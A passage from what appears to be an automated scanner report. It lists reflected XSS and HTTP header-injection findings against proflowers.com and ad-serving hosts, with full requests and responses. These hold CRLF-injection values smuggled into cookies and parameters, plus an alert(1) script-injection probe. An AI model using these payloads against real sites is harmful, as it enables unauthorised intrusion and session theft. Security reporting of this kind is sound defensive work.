2.337. http://www.proflowers.com/fresh-flowers-new [PFC_BrowserId cookie]

2.338. http://www.proflowers.com/fresh-fruit-baskets-frt [PFC_BrowserId cookie]

2.339. http://www.proflowers.com/fruit-clubs-clb [PFC_BrowserId cookie]

2.340. http://www.proflowers.com/funeral-flowers-fnr [PFC_BrowserId cookie]

2.341. http://www.proflowers.com/get-well-flowers-get [PFC_BrowserId cookie]

2.342. http://www.proflowers.com/gfbu-bestsellers-bst [PFC_BrowserId cookie]

2.343. http://www.proflowers.com/gift-baskets-gft [PFC_BrowserId cookie]

2.344. http://www.proflowers.com/gourmet-christmas-baskets-cgm [PFC_BrowserId cookie]

2.345. http://www.proflowers.com/green-plants-pgr [PFC_BrowserId cookie]

2.346. http://www.proflowers.com/house-plants-pbs [PFC_BrowserId cookie]

2.347. http://www.proflowers.com/housewarming-flowers-hwg [PFC_BrowserId cookie]

2.348. http://www.proflowers.com/iris-flowers-iri [PFC_BrowserId cookie]

2.349. http://www.proflowers.com/just-because-gifts-jbe [PFC_BrowserId cookie]

2.350. http://www.proflowers.com/landingpress.aspx [PFC_BrowserId cookie]

2.351. http://www.proflowers.com/lilies-lil [PFC_BrowserId cookie]

2.352. http://www.proflowers.com/mrs-fields-cookies-mrs [PFC_BrowserId cookie]

2.353. http://www.proflowers.com/new-baby-flowers-bab [PFC_BrowserId cookie]

2.354. http://www.proflowers.com/orchids-orc [PFC_BrowserId cookie]

2.355. http://www.proflowers.com/organic-org [PFC_BrowserId cookie]

2.356. http://www.proflowers.com/pink-flowers-sgk [PFC_BrowserId cookie]

2.357. http://www.proflowers.com/portalslanding.aspx [PFC_BrowserId cookie]

2.358. http://www.proflowers.com/potted-garden-gar [PFC_BrowserId cookie]

2.359. http://www.proflowers.com/potted-roses-prp [PFC_BrowserId cookie]

2.360. http://www.proflowers.com/pottedorchidsandexotics-poe [PFC_BrowserId cookie]

2.361. http://www.proflowers.com/productcategoryselection.aspx [PFC_BrowserId cookie]

2.362. http://www.proflowers.com/radio/default.aspx [PFC_BrowserId cookie]

2.363. http://www.proflowers.com/romantic-flowers-lov [PFC_BrowserId cookie]

2.364. http://www.proflowers.com/roses-ros [PFC_BrowserId cookie]

2.365. http://www.proflowers.com/seasonal-plants-pse [PFC_BrowserId cookie]

2.366. http://www.proflowers.com/send-flowers-bsl [PFC_BrowserId cookie]

2.367. http://www.proflowers.com/spa-baskets-spa [PFC_BrowserId cookie]

2.368. http://www.proflowers.com/sunflowers-sun [PFC_BrowserId cookie]

2.369. http://www.proflowers.com/sympathy-flowers-gifts-sym [PFC_BrowserId cookie]

2.370. http://www.proflowers.com/teddy-bears-gifts-plu [PFC_BrowserId cookie]

2.371. http://www.proflowers.com/thank-you-flowers-thk [PFC_BrowserId cookie]

2.372. http://www.proflowers.com/tulips-tul [PFC_BrowserId cookie]

2.373. http://www.proflowers.com/unique-christmas-gifts-cfv [PFC_BrowserId cookie]

2.374. http://www.proflowers.com/winter-collection-wtr [PFC_BrowserId cookie]

2.375. http://www.proflowers.com/wreaths-wth [PFC_BrowserId cookie]



1. HTTP header injection  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 5a9ca%0d%0a0798803c815 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; A2=f76j9MhU0bH30000820wrLfPRi9Yyx05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=05a9ca%0d%0a0798803c815; B2=76Kr0820wrA6Dcf0820wrA7KMi0820wsi7pH.0820wrL; u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; E2=05hQ820wsi0bH3820wrL07ftg410rA; C3=0va8820wrL0000001_0m+L820wsi0000004_0uyK820wrA0000001_0t8k820wrA0000200_; u3=1; D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=05a9ca
0798803c815
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Dec 2010 19:26:58 GMT
Connection: close


1.2. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload cb4b9%0d%0afd494eeed73 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; A2=f76j9MhU0bH30000820wrLfPRi9Yyx05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0cb4b9%0d%0afd494eeed73; B2=76Kr0820wrA6Dcf0820wrA7KMi0820wsi7pH.0820wrL; u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; E2=05hQ820wsi0bH3820wrL07ftg410rA; C3=0va8820wrL0000001_0m+L820wsi0000004_0uyK820wrA0000001_0t8k820wrA0000200_; u3=1; D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0cb4b9
fd494eeed73
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Dec 2010 19:26:58 GMT
Connection: close


1.3. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload ef08e%0d%0afacb348d44 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4144466%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.28438299894332886&flv=ef08e%0d%0afacb348d44&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.bbc.co.uk/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=f76j9MhU0bH30000820wrLfPRi9Yyy05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; B2=76Kr0820wrA7KMi0820wsi6Dcf0820wrA7pH.0820wrL; C3=0va8820wrL0000001_0m+L820wsi0000004_0t8k820wrA0000200_0uyK820wrA0000001_; D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA; E2=05hQ820wsi0bH3820wrL07ftg410rA; u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=f76j9MhU0bH30000820wrLfPRi9Yyx05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=76Kr0820wrA6Dcf0820wrA7KMi0820wsi7pH.0820wrL; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0va8820wrL0000001_0m+L820wsi0000004_0uyK820wrA0000001_0t8k820wrA0000200_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=ef08e
facb348d44
&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Dec 2010 19:27:00 GMT
Connection: close
Content-Length: 0


1.4. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 1a8b4%0d%0a9e6f76a5253 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4144466%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.28438299894332886&flv=10.1103&wmpv=0&res=1a8b4%0d%0a9e6f76a5253 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.bbc.co.uk/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=f76j9MhU0bH30000820wrLfPRi9Yyy05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; B2=76Kr0820wrA7KMi0820wsi6Dcf0820wrA7pH.0820wrL; C3=0va8820wrL0000001_0m+L820wsi0000004_0t8k820wrA0000200_0uyK820wrA0000001_; D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA; E2=05hQ820wsi0bH3820wrL07ftg410rA; u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=f76j9MhU0bH30000820wrLfPRi9Yyx05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=76Kr0820wrA6Dcf0820wrA7KMi0820wsi7pH.0820wrL; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0va8820wrL0000001_0m+L820wsi0000004_0uyK820wrA0000001_0t8k820wrA0000200_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=1a8b4
9e6f76a5253
&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Dec 2010 19:27:00 GMT
Connection: close
Content-Length: 0


1.5. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 30065%0d%0a9e1125bf72b was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4144466%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.28438299894332886&flv=10.1103&wmpv=30065%0d%0a9e1125bf72b&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.bbc.co.uk/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=f76j9MhU0bH30000820wrLfPRi9Yyy05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; B2=76Kr0820wrA7KMi0820wsi6Dcf0820wrA7pH.0820wrL; C3=0va8820wrL0000001_0m+L820wsi0000004_0t8k820wrA0000200_0uyK820wrA0000001_; D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA; E2=05hQ820wsi0bH3820wrL07ftg410rA; u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: CP="NOI DEVa OUR BUS UNI"
Set-Cookie: A2=f76j9MhU0bH30000820wrLfPRi9Yyx05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=76Kr0820wrA6Dcf0820wrA7KMi0820wsi7pH.0820wrL; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0va8820wrL0000001_0m+L820wsi0000004_0uyK820wrA0000001_0t8k820wrA0000200_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=30065
9e1125bf72b
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


1.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 41f45%0d%0a1530027748b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2026514&PluID=0&w=300&h=600&ord=943421&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/t%3B225422721%3B0-0%3B0%3B19196799%3B4307-300/250%3B39655019/39672806/1%3B%3B%7Eokv%3D%3Bslot%3Dmpu%3Bsz%3D300x250%2C300x600%3Bsectn%3Dnonnews%3Bctype%3Dindex%3Bnnsec%3Dhomepage_int%3Breferrer%3Dnonbbc%3Breferrer_domain%3D%3Brsi%3D%3Btile%3D2%3B%7Esscs%3D%3f$$\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; A2=f76j9MhU0bH30000820wrLfPRi9Yyx05hQ0000820wsieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=041f45%0d%0a1530027748b; B2=76Kr0820wrA6Dcf0820wrA7KMi0820wsi7pH.0820wrL; u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; E2=05hQ820wsi0bH3820wrL07ftg410rA; C3=0va8820wrL0000001_0m+L820wsi0000004_0uyK820wrA0000001_0t8k820wrA0000200_; u3=1; D3=0m+L01Ty820wsi0va802nr820wrL0t8k005D820wrA0uyK005D820wrA;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 1154
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=041f45
1530027748b
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=f76j9MhU0bH30000820wrLfPRi9Yyz05hQ0000g410sieEn29IrS07ft0000820wrAe38E9IrS07ft0000820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=76Kr0820wrA7KMi0g410si6Dcf0820wrA7pH.0820wrL; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0va8820wrL0000001_0m+Lg410si0000004_0t8k820wrA0000200_0uyK820wrA0000001_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0m+L01Tyg410si0va802nr820wrL0t8k005D820wrA0uyK005D820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=05hQg410si0bH3820wrL07ftg410rA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Dec 2010 19:27:01 GMT
Connection: close

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

1.7. http://d.adroll.com/pixel/B6UOTQYSFREEFH6B4JOQUF/GDERUH7475AOHPINDBKCLD [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/B6UOTQYSFREEFH6B4JOQUF/GDERUH7475AOHPINDBKCLD

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a79a7%0d%0a4f1b70042a5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/a79a7%0d%0a4f1b70042a5/GDERUH7475AOHPINDBKCLD HTTP/1.1
Host: d.adroll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: __adroll=840abdb4c51252b4087e54006986c408;

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.61
Date: Thu, 16 Dec 2010 19:51:53 GMT
Connection: close
Set-Cookie: __adroll=840abdb4c51252b4087e54006986c408; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/a79a7
4f1b70042a5
/GDERUH7475AOHPINDBKCLD/IL4IOA2AXRH4XK6CMYMKNO.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


1.8. http://d.adroll.com/pixel/B6UOTQYSFREEFH6B4JOQUF/GDERUH7475AOHPINDBKCLD [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/B6UOTQYSFREEFH6B4JOQUF/GDERUH7475AOHPINDBKCLD

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 91fd1%0d%0a893ddeee050 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/B6UOTQYSFREEFH6B4JOQUF/91fd1%0d%0a893ddeee050 HTTP/1.1
Host: d.adroll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: __adroll=840abdb4c51252b4087e54006986c408;

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.61
Date: Thu, 16 Dec 2010 19:51:53 GMT
Connection: close
Set-Cookie: __adroll=840abdb4c51252b4087e54006986c408; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/B6UOTQYSFREEFH6B4JOQUF/91fd1
893ddeee050
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2. Cross-site scripting (reflected)  previous
There are 375 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. https://accounts.proflowers.com/Default.aspx [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bd01\"%3balert(1)//ea9eccb5d73 was submitted in the ref parameter. This input was echoed as 2bd01\\";alert(1)//ea9eccb5d73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Default.aspx?ref=fgvprtlsbbc_ros_300x250Slider_SWork19HolTrad2bd01\"%3balert(1)//ea9eccb5d73 HTTP/1.1
Host: accounts.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
